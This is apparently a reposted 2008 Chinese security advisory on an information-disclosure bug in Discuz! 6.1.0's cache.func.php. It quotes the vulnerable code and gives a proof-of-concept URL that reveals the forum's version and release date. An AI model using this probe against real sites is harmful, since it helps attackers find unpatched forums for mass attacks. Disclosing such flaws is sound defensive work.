Discuz!cache.func.php 信息泄漏 bug
2008-11-16 20:31
549 查看
Discuz!cache.func.php 信息泄漏 bug author: 80vul-A team:http://www.80vul.com 漏洞存在于文件\include\cache.func.php里的代码如下: define('DISCUZ_KERNEL_VERSION', '6.1.0'); define('DISCUZ_KERNEL_RELEASE', '20080418'); if(isset($_GET['kernel_version'])) { exit('Crossday Discuz! Board<br />Developed by Comsenz Inc.<br /><br />Version: '.DISCUZ_KERNEL_VERSION.'<br />Release: '.DISCUZ_KERNEL_RELEASE); } elseif(!defined('IN_DISCUZ')) { exit('Access Denied'); } 提交kernel_version的时会显示版本及补丁信息,如果攻击者结合google-hacking等技术很容易找到没有升级的程序,导致mass类攻击. poc: http://www.discuz.net/include/cache.func.php?kernel_version=1 显示: Crossday Discuz! Board Developed by Comsenz Inc. Version: 7.0.0 Release: 20081031 [难道官方是打算1031发布7.00,不知道杂的又推迟了:(]
相关文章推荐
- Discuz7.2 BUG :"Warning: sprintf() [function.sprintf]: Too few arguments in xxxxxxxx/include/discuzcode.func.php on line 369"
- PHPCMS2008源码浅析-cache.func.php PHPCMS20008二次开发
- Discuz!源代码分析系列:./include/global.func.php(2)
- 阻止PHP彩蛋信息泄漏 [转]
- discuz中 function_core.php中的dmkdir有死环bug
- Discuz! trade.php 数据库'注射' bug
- Discuz! moderation.inc.php 数据库'注射' bug
- php下获取Discuz论坛登录用户名、用户组、用户ID等信息的实现代码
- 如何在Discuz实际开发中开启PHP自带的错误信息
- php下获取Discuz论坛登录用户名、用户组、用户ID等信息的实现代码
- Discuz!源代码分析系列:./include/global.func.php(3)
- 【转】 Discuz模板解析原理template.func.php
- cache.func.php
- PHP彩蛋信息介绍和阻止泄漏的方法(隐藏功能)
- phpinfo信息泄漏
- Discuz! 路径信息泄露 bug
- Discuz!源代码分析系列(4)-./include/template.func.php(模板)
- 如何在Discuz实际开发中开启PHP自带的错误信息
- Discuz!源代码分析系列:./include/global.func.php(4)
- discuz! admin\runwizard.inc.php get-webshell bug